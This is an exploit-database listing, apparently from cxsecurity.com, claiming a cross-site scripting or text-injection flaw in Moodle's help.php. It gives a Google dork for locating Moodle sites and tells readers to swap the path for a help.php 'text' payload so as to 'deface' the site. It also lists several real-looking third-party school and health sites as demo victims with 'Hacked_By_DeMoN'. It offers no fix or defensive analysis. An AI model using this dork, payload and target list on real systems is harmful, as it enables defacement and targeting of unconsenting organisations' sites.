Moodle cms/Cross Site Scripting(XSS)

2015.11.06
Credit: Guardiran Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/course/category.php?id=

######################################################## # Exploit Title: Moodle cms/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:/course/category.php?id= # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://moodle.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then Replace This Code # [/help.php?text=hecked_text] # Instead # [/course/category.php?id=] # And Replace Your Text Deface At [hecked_text] And You See That To Site Defaced With You. ######################################################## # Demo: # http://moodle.jonfila.Xcom/help.php?text=Hacked_By_DeMoN # http://elearning.noeXtic.org/help.php?text=Hacked_By_DeMoN # http://nehacert.org/Xmoodle/help.php?text=Hacked_By_DeMoN # http://dwmbeancoXunter.com/moodle/help.php?text=Hacked_By_DeMoN # http://ipesvirtual.Xdfpd.edu.uy/help.php?text=Hacked_By_DeMoN # http://clickandleXarn.bmgi.org/help.php?text=Hacked_By_DeMoN # http://learnonlxine.health.nz/help.php?text=Hacked_By_DeMoN ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top